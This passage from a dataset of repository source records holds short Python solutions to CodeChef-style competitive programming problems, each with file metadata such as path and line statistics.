0.47297295928001404, "alphanum_fraction": 0.47876447439193726, "avg_line_length": 24.850000381469727, "blob_id": "76dc0144d3a525d320153c2d568b995a5b62e6ab", "content_id": "9ad8ac8ad21da9bb3b2b05605385bc5edf8123fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 42, "num_lines": 20, "path": "/TRUEDARE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range (int(input())):\n rt=int(input())\n tr=[int(i) for i in input().split()]\n rd=int(input())\n dr=[int(i) for i in input().split()]\n st=int(input())\n ts=[int(i) for i in input().split()]\n sd=int(input())\n ds=[int(i) for i in input().split()]\n count=0\n for t in set(ts):\n if t in set(tr):\n count+=1\n for d in set(ds):\n if d in set(dr):\n count+=1\n if count==(len(set(ts))+len(set(ds))):\n print(\"yes\")\n else:\n print(\"no\") \n" }, { "alpha_fraction": 0.3781512677669525, "alphanum_fraction": 0.4117647111415863, "avg_line_length": 16, "blob_id": "1cd9e48c65af101ce0e3e2ce4a38ed053b878580", "content_id": "5ef8e281ca6aea6956a4aa0ae534c318e7eb3c9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/TRICOIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s,i=0,1\n while(s<=n):\n s+=i\n i+=1\n print(i-2)\n" }, { "alpha_fraction": 0.42236024141311646, "alphanum_fraction": 0.44720497727394104, "avg_line_length": 22, "blob_id": "0b9052e52a2977c7254e08cc3d904e2365298013", "content_id": "28f45831800d3705fcb7f4dc5846023b5d6d48e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 41, "num_lines": 7, "path": "/GDOG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n m,r=0,1\n for i in range(2,k+1):\n if(n%i>m):\n m=n%i\n print(m)\n" }, { "alpha_fraction": 0.36421725153923035, "alphanum_fraction": 0.3801916837692261, "avg_line_length": 18.66666603088379, "blob_id": "75674f827c4d3866536f98bf0da4777961b9c343", "content_id": "33bf5d803ee33636f38e1f5a6306eca7f3ee42f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CHFM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n s=0\n k=0\n for i in a:\n s+=i\n for i in range(n):\n if(s/n==(s-a[i])/(n-1)):\n k=i+1\n break\n if(k==0):\n print(\"Impossible\")\n else:\n print(k)\n \n \n" }, { "alpha_fraction": 0.35888078808784485, "alphanum_fraction": 0.3990267515182495, "avg_line_length": 23.176469802856445, "blob_id": "40ef497da8d7f960898dade8814a034b6ca52a1f", "content_id": "d1dd598da1d22148f4c78017a491575aa15ff272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "no_license", "max_line_length": 39, "num_lines": 34, "path": "/ARTBALAN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def hash_it(arr, s):\n for i in range(len(s)):\n arr[ord(s[i]) - 65] += 1 \n arr = sorted(arr, reverse = True) \n return arr\ndef balance(s, arr, l):\n val = len(set(s))\n res = 10000000000\n pp = 0\n for p in range(1,27):\n ptr = 0\n if l % p == 0:\n var = l // p\n for q in range(p):\n if arr[q] > var:\n ptr += arr[q] - var\n for q in range(p,26):\n if arr[q] > 0:\n ptr += arr[q]\n res = min(ptr,res)\n pp += 1\n if pp == 26:\n pp = 0 \n return(res) \n \nfor _ in range(int(input())): \n s = input() \n l = len(s) \n if l <= 2: \n print(0)\n continue\n arr = [0 for i in range(0,27)]\n arr = hash_it(arr,s)\n print(balance(s, arr, l))\n" }, { "alpha_fraction": 0.42105263471603394, "alphanum_fraction": 0.4421052634716034, "avg_line_length": 22.75, "blob_id": "39a091dcad1b6f4b4cfc86590a975b87e82a9fb2", "content_id": "c3b01f5500d6c81e284c071a572545b918c49de9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/CHN15A.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n s=[int(i) for i in input().split()]\n c=0\n for i in s:\n if((i+k)%7==0):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.4243176281452179, "alphanum_fraction": 0.44416874647140503, "avg_line_length": 20.83333396911621, "blob_id": "7248fa647067ea022d6194ff024ba561c5103e00", "content_id": "3e2076635b62199f23a6776c6aa05fa90907aaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "no_license", "max_line_length": 39, "num_lines": 18, "path": "/CCOOK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n c=0\n for i in a:\n if(i==1):\n c+=1\n if(c==0):\n print(\"Beginner\")\n elif(c==1):\n print(\"Junior Developer\")\n elif(c==2):\n print(\"Middle Developer\")\n elif(c==3):\n print(\"Senior Developer\")\n elif(c==4):\n print(\"Hacker\")\n else:\n print(\"Jeff Dean\")\n \n \n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 23.16666603088379, "blob_id": "f2a3a77d52766de5d604e3ec4ac9c3bdcc100bc3", "content_id": "1328646ad7105643cbe7f129a39d13b4c45921b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 43, "num_lines": 6, "path": "/FLOW013.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b,c=[int(i) for i in input().split()]\n if(a+b+c==180):\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.39662447571754456, "alphanum_fraction": 0.4177215099334717, "avg_line_length": 20.545454025268555, "blob_id": "e7f35757c10d81ff733cce00aa408dc098aedf45", "content_id": "15c8a32c8f5afa38f1dd4cf06ece0dce42f300fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 30, "num_lines": 11, "path": "/MISSP.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a,p=[],n-1\n for i in range(n):\n a.append(int(input()))\n a.sort()\n for i in range(0,n-1,2):\n if(a[i]!=a[i+1]):\n p=i\n break;\n print(a[p])\n" }, { "alpha_fraction": 0.4032258093357086, "alphanum_fraction": 0.4233871102333069, "avg_line_length": 16.714284896850586, "blob_id": "b39efc3858dd5f89a64c32f11752cfc6365ca5cb", "content_id": "025d3c4f0613cad7d516ad94e9bf26c9fc09535f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "no_license", "max_line_length": 39, "num_lines": 14, "path": "/PERMUT2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "while(True):\n n=int(input())\n if(n==0):\n break\n a=[int(i) for i in input().split()]\n b=[0]*n\n k=1\n for i in a:\n b[i-1]=k\n k+=1\n if(a==b):\n print(\"ambiguous\")\n else:\n print(\"not ambiguous\")\n" }, { "alpha_fraction": 0.5430463552474976, "alphanum_fraction": 0.5695364475250244, "avg_line_length": 14.100000381469727, "blob_id": "858a06c6323fdae18cc084666fcad7681439f0f7", "content_id": "bac7a211a8bcde00a0d2fc6e3508e8c786bd90e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 22, "num_lines": 10, "path": "/CHFIDEAL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import sys\nprint(\"3\")\nsys.stdout.flush()\nn = int(input())\nif n == 2:\n print(\"1\")\n sys.stdout.flush()\nelse:\n print(\"2\")\n sys.stdout.flush()\n" }, { "alpha_fraction": 0.29602888226509094, "alphanum_fraction": 0.3285198509693146, "avg_line_length": 22.81818199157715, "blob_id": "069bbf04d5cbbe8bda4379597ac805e2876788ad", "content_id": "85e9afd86c9a42099c5ecac989a37c2371cc0c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/PINS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n n = int(input())\n print(1, end = \" \")\n if n%2 != 0:\n print(1,end = \"\")\n l = [0]*(n//2)\n print(*l, sep = \"\")\n else:\n print(1,end = \"\")\n l = [0]*((n-(n//2)))\n print(*l, sep = \"\")\n \n" }, { "alpha_fraction": 0.33528265357017517, "alphanum_fraction": 0.376218318939209, "avg_line_length": 25.947368621826172, "blob_id": "ba7f6dbe03a03178f1b4d9969cbc76de43e967d9", "content_id": "e81226b17d9d3284acb199319ffdb7c6d76bd51b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/EID2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a1,a2,a3,c1,c2,c3=[int(i) for i in input().split()]\n c=[c1,c2,c3]\n d=[c1,c2,c3]\n a=[a1,a2,a3]\n k=0\n for i in range(2):\n for j in range(i+1,3):\n if(a[i]>a[j]):\n a[i],a[j]=a[j],a[i]\n c[i],c[j]=c[j],c[i]\n if((a[i]==a[j] and c[i]!=c[j]) or(a[i]!=a[j] and c[i]==c[j])):\n k+=1;\n break;\n d.sort()\n if(k==0 and c==d):\n print(\"FAIR\")\n else:\n print(\"NOT FAIR\")\n\n" }, { "alpha_fraction": 0.47265625, "alphanum_fraction": 0.5234375, "avg_line_length": 33.13333511352539, "blob_id": "85230d8cb59894a2974fb57a64bfef5397cfe1b6", "content_id": "6e8991aed152fdb1671460e04de66a57969e45b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 65, "num_lines": 15, "path": "/COMM3.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n r=int(input())\n c=[int(i) for i in input().split()]\n hs=[int(i) for i in input().split()]\n sc=[int(i) for i in input().split()]\n d1=math.sqrt(math.pow(c[0]-hs[0],2)+math.pow(c[1]-hs[1],2))\n d2=math.sqrt(math.pow(c[0]-sc[0],2)+math.pow(c[1]-sc[1],2))\n d3=math.sqrt(math.pow(sc[0]-hs[0],2)+math.pow(sc[1]-hs[1],2))\n if(d1<=r and d2<=r):\n print(\"yes\")\n elif((d1<=r or d2<=r) and d3<=r):\n print(\"yes\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.2593320310115814, "alphanum_fraction": 0.2829076647758484, "avg_line_length": 18.5, "blob_id": "6f3ddf5dbac23da14761a16e118d2a78fd32d1f5", "content_id": "ff0a1198fca71f6155dd81d3f62eac600ca501a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/SNAKPROC.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n h,t=0,0\n for i in s:\n if(i=='H'):\n h+=1\n if(i=='T'):\n t+=1\n if(t!=h):\n print(\"Invalid\")\n else:\n k,p=0,0\n \n for i in s:\n if(i=='H'):\n k+=1\n if(i=='T'):\n k-=1\n if(k>1 or k<0):\n p=1\n break\n if(p==1):\n print(\"Invalid\")\n else:\n print(\"Valid\")\n \n" }, { "alpha_fraction": 0.3414634168148041, "alphanum_fraction": 0.40243902802467346, "avg_line_length": 21.363636016845703, "blob_id": "7bfc52d753fd0581f78f45a63ed626ac7c9a532f", "content_id": "5f24111ac7331839bac06bc39490a6d195c4d1c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/CFMM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[\"\"]*n\n for i in range(n):\n s[i]=input()\n c=[0]*26\n for i in s:\n for j in i:\n c[ord(j)-97]+=1\n m=[c[2]//2,c[14],c[3],c[4]//2,c[7],c[5]]\n print(min(m))\n" }, { "alpha_fraction": 0.4264705777168274, "alphanum_fraction": 0.44117647409439087, "avg_line_length": 19.399999618530273, "blob_id": "1909a11e135c3df01e4602f93e950b99ac8ea9ba", "content_id": "36dbbfedbbc25bc83367856038ca9c8fd56acf53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CNDLOVE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=0\n for i in range(n):\n b=b+a[i]\n if(b%2==0):\n print(\"NO\")\n else:\n print(\"YES\")\n" }, { "alpha_fraction": 0.3268292546272278, "alphanum_fraction": 0.37560975551605225, "avg_line_length": 17.18181800842285, "blob_id": "d9c326eec2fadc731e379eb8596f1e7c99b3677b", "content_id": "b2a83aa61f120aed71c8f0b71467b4fb1ea115ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/FIBEASY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n if(n==1):\n print(0)\n elif(n<4):\n print(1)\n else:\n e=[0,9,2,3]\n a=len(bin(n))-3\n s=a%4\n print(e[s])\n \n" }, { "alpha_fraction": 0.4529148042201996, "alphanum_fraction": 0.49775785207748413, "avg_line_length": 18.81818199157715, "blob_id": "bfd8cd4dd1988ca2f332bb32213b91f445c1ff39", "content_id": "1f0b21eec2e01c8a4b8c1d8625994c89d651afca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 45, "num_lines": 11, "path": "/ELEVSTRS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n,v1,v2=[int(i) for i in input().split()]\n d1=2*n\n d2=math.sqrt(2)*n\n e=d1/v2\n s=d2/v1\n if(e>s):\n print(\"Stairs\")\n else:\n print(\"Elevator\")\n \n" }, { "alpha_fraction": 0.4170212745666504, "alphanum_fraction": 0.44255319237709045, "avg_line_length": 21.600000381469727, "blob_id": "d306a025e9294f6f7c7ec82ce594716743a15317", "content_id": "a4c7118b737439ac6560319603d7cddccc94310c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CARSELL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[int(i) for i in input().split()]\n mod=(10**9)+7\n s=0\n p.sort(reverse=True)\n for i in range(n):\n if((p[i]-i)>0):\n s+=p[i]-i\n print(s%mod)\n \n" }, { "alpha_fraction": 0.45098039507865906, "alphanum_fraction": 0.4803921580314636, "avg_line_length": 27.33333396911621, "blob_id": "087eec5dc4d321afeac6936d13c571530d9eaf5c", "content_id": "3d91e6204b2ccfc555f17db285f38ed58e697fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 107, "num_lines": 18, "path": "/EVENT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s, e, l, r = [i for i in input().split()]\n day_dict = { \"saturday\":1,\"sunday\":2, \"monday\":3, \"tuesday\":4, \"wednesday\":5, \"thursday\":6, \"friday\":7}\n l = int(l)\n r = int(r)\n durr = day_dict[e]-day_dict[s]+1\n num = 0\n time_spent = 0\n for i in range(durr, r+1,7):\n if i>=l and i<=r:\n num += 1\n time_spent = i\n if num > 1:\n print(\"many\")\n elif num == 0:\n print(\"impossible\")\n else:\n print(time_spent)\n" }, { "alpha_fraction": 0.3163636326789856, "alphanum_fraction": 0.3527272641658783, "avg_line_length": 17.33333396911621, "blob_id": "a2e9300a2c8114833b5ac775b3fab762bb49b2bb", "content_id": "abc8ed58785c01a14c11a13bb100989690123711", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CPAIRS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n c,o=0,0\n for i in a:\n if(i%2!=0):\n o+=1\n i=0\n while(i<n):\n if(a[i]%2!=0):\n o-=1\n else:\n c+=o\n i+=1\n print(c)\n" }, { "alpha_fraction": 0.4012944996356964, "alphanum_fraction": 0.45954692363739014, "avg_line_length": 24, "blob_id": "8670e46c54364203d0be4cad831493fd2992ee36", "content_id": "01a64fbce81d78ecd0d8766d2dadb9d0d964b8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 309, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/CHRL4.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n,k=[int(i) for i in input().split()]\na=[int(i) for i in input().split()]\nmod=mod = (10**9)+7\np = [[a[0],0]]\nfor i in range(1,n):\n while p[0][1] + k < i:\n p.pop(0)\n temp = p[0][0]*a[i]\n while p[-1][0]>temp and len(p) != 1:\n p.pop(-1)\n p.append([temp,i])\nprint(p[-1][0]%mod)\n \n" }, { "alpha_fraction": 0.5338345766067505, "alphanum_fraction": 0.5413534045219421, "avg_line_length": 25.600000381469727, "blob_id": "8f8084edbd79bc31e5acf656c375fd21ccc18b02", "content_id": "dafda5f519d8ff762ecd6b9648085cd340aa228b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/EXUNA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort(reverse= True)\n print(a[n-1])\n" }, { "alpha_fraction": 0.46188339591026306, "alphanum_fraction": 0.48430493474006653, "avg_line_length": 23.77777862548828, "blob_id": "25804102a5ec1784251c4993e2112a5e82309e82", "content_id": "1f7bc320fb12a975314e6391fea7dfd897b142f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/MGCSET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n,m=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n k=0\n for i in a:\n if (int(i%m)==0):\n k+=1\n print(int(math.pow(2,k)-1))\n" }, { "alpha_fraction": 0.4330708682537079, "alphanum_fraction": 0.4566929042339325, "avg_line_length": 16.14285659790039, "blob_id": "9a3b1ef2570672b5501c2a460f84f71d528f4f31", "content_id": "5e362e5fe38f142494ad71402c4d89b72da4b499", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/INTEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "a, b = [int(i) for i in input().split()]\nc=0\nfor i in range(a):\n d=int(input())\n if d%b==0:\n c+=1\nprint(c) \n" }, { "alpha_fraction": 0.3496503531932831, "alphanum_fraction": 0.4475524425506592, "avg_line_length": 19.428571701049805, "blob_id": "ddddeac364e334dc1939cca22d8ba11d014aacbb", "content_id": "63187078edd12078a1b9c8fc4b4dfdeef3c8bcef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/FLOW011.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=int(input())\n if s<1500:\n gs=s+(s*0.9)+(s*0.1)\n else:\n gs=s+500+(0.98*s)\n print(gs)\n" }, { "alpha_fraction": 0.4583333432674408, "alphanum_fraction": 0.4895833432674408, "avg_line_length": 15, "blob_id": "771a9d5da71877d23a69f7544aa14200e44b4505", "content_id": "48e613538accfe62feedbddd43bef584b9157135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/AMR15A.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[int(i) for i in input().split()]\nx,y=0,0\nfor i in a:\n if(i%2==0):\n x+=1\n else:\n y+=1\nif (x>y):\n print(\"READY FOR BATTLE\")\nelse:\n print(\"NOT READY\")\n" }, { "alpha_fraction": 0.43939393758773804, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 22.625, "blob_id": "6b5ef888ed4ec37096ab7bdbc6ef7deb610803d8", "content_id": "f354925de48323c75df4c59901508c59a3af0040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/CHNGIT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n c=0\n for i in set(a):\n if(c<a.count(i)):\n c=a.count(i)\n print(len(a)-c)\n \n" }, { "alpha_fraction": 0.3687150776386261, "alphanum_fraction": 0.3854748606681824, "avg_line_length": 27.600000381469727, "blob_id": "c676b30ae24e74f14b7bad63560b28c169f94978", "content_id": "811dde33ef1ebc37e190da97742981c696886fa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/TWONMS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b,n=[int(i) for i in input().split()]\n if(int(n%2)==1):\n a*=2\n print(int(max(a,b)//min(a,b)))\n \n \n \n \n" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 31, "blob_id": "bc12580b7fd63cbaaef0e4cdee89b917ca0031b7", "content_id": "128b0a2df87db56a0a8d528fa6cbfd23fcb7ff57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/REMISS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n print(max(a,b),a+b)\n" }, { "alpha_fraction": 0.44247788190841675, "alphanum_fraction": 0.4601770043373108, "avg_line_length": 19.090909957885742, "blob_id": "480c69b3bba85cc0e3f9ac5a6b7559853d6cf22f", "content_id": "6724070efda64995067d67e6b33622099c148389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/RD19.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n p=a[0]\n for i in range(n):\n p=math.gcd(p,a[i])\n if(p==1):\n print(0)\n else:\n print(-1)\n \n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.35474005341529846, "avg_line_length": 22.846153259277344, "blob_id": "33ddded094f925729cb460607e88310a7718584f", "content_id": "916af56bcfed1004cc4a05ed341ee80fd19626e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/KTTABLE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[int(i) for i in input().split()]\n c=0\n for i in range(n):\n if(i==0):\n if(b[0]<=a[0]):\n c+=1\n else:\n if(b[i]<=a[i]-a[i-1]):\n c+=1\n print(c)\n \n" }, { "alpha_fraction": 0.5348837375640869, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 24.799999237060547, "blob_id": "efc20fdf62f54bd514771ebf7598a0c2f6cbcd13", "content_id": "21155c689caacc47b08d1975e762c0e40a71365d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/RECTSQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n l,b=[int(i) for i in input().split()]\n x=math.gcd(l,b)\n print((l//x)*(b//x))\n" }, { "alpha_fraction": 0.3445378243923187, "alphanum_fraction": 0.3669467866420746, "avg_line_length": 17.052631378173828, "blob_id": "2540c8a987f3fc19a3cea874fd76e003c3cdf7ea", "content_id": "e0b8513789c7887025edaf9f5fdfb9b3bd3025c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/PLAYPIAN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n n=len(s)//2\n a=list()\n p=0\n k=2\n flag=0\n for i in range(n):\n a.append(s[p:k])\n k+=2\n p+=2\n for i in range(n):\n if (\"AB\"!=a[i] and \"BA\"!=a[i]):\n flag+=1\n break\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n \n \n" }, { "alpha_fraction": 0.36000001430511475, "alphanum_fraction": 0.4057142734527588, "avg_line_length": 17.88888931274414, "blob_id": "ef13ce58f11e89dbf116c999095e55bb55a6d0d0", "content_id": "61caa738c3ae78fdcd0207869694ec8bfc8908ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/LUCKFOUR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n count =0\n n=int(input())\n while(n>0):\n d=int(n%10)\n if(d==4):\n count+=1\n n=n//10\n print(count)\n \n" }, { "alpha_fraction": 0.4331550896167755, "alphanum_fraction": 0.47593581676483154, "avg_line_length": 25.714284896850586, "blob_id": "7a13c5aa9bfd52e87ecb820174b5425d2d3144a8", "content_id": "66da2bed71e3093441fde6364a8aab334f3e161f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 41, "num_lines": 7, "path": "/FLOW009.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n q,p=[int(i) for i in input().split()]\n if(q>1000):\n pr=float((q*p)-((q*p)/10))\n else:\n pr=float(q*p)\n print(\"{0:.6f}\".format(pr))\n" }, { "alpha_fraction": 0.41999998688697815, "alphanum_fraction": 0.4320000112056732, "avg_line_length": 21.727272033691406, "blob_id": "b5ce425dd4f27f0fe767017b5441c5155485cf87", "content_id": "8502507c3ded2d15e1565ef400a5dd8e2bf2507b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/LINCHESS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n p=[int(i) for i in input().split()]\n a=[]\n for i in p:\n if(k%i==0):\n a.append(i)\n if(len(a)==0):\n print(-1)\n else:\n print(max(a))\n" }, { "alpha_fraction": 0.35789474844932556, "alphanum_fraction": 0.38596490025520325, "avg_line_length": 20.538461685180664, "blob_id": "1c8280ef99e7e31434c66ed784fb5af5547cab4e", "content_id": "6d928cde1a7710942d3fc8327b01898f4590ea8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/NW1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,st1=input().split()\n n=int(n)\n s=[0]*7\n st=[\"mon\", \"tues\", \"wed\", \"thurs\", \"fri\", \"sat\" , \"sun\"]\n b=st.index(st1)\n for i in range(n):\n s[b]+=1\n if(b!=6):\n b+=1\n else:\n b=0\n print(*s)\n \n" }, { "alpha_fraction": 0.4455445408821106, "alphanum_fraction": 0.4653465449810028, "avg_line_length": 24.125, "blob_id": 